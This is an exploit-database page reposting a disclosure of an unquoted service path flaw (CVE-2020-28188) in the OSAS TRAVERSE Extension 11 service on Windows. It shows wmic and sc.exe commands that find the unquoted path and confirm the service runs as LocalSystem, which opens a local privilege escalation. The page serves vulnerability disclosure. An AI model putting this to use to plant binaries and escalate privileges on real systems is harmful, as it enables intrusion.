Advertisement






OSAS Traverse Extension 11 Unquoted Service Path

CVE Category Price Severity
CVE-2020-28188 CWE-428 $5,000 High
Author Risk Exploitation Type Date
Unknown High Local 2021-03-22
CPE
cpe:cpe:/a:osas:traverse:extension:11
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H 0.3713 0.79802

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030148

Below is a copy:

OSAS Traverse Extension 11 Unquoted Service Path
# Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path
# Exploit Auth: Tech Johnny
# Vendor Homepage: https://www.osas.com
# Version: 11 x86
# Tested on: Windows 2012R2

Details:

C:\Windows\system32>wmic service get name, pathname, displayname,
startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr
/i /v """

TRAVERSE Automation Service TravExtensionHostSvc C:\Program Files\Open
Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe Auto

C:\Windows\system32>sc.exe qc travextensionhostsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: travextensionhostsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe
LOAD_ORDER_GROUP : TAG : 0
DISPLAY_NAME : TRAVERSE Automation Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.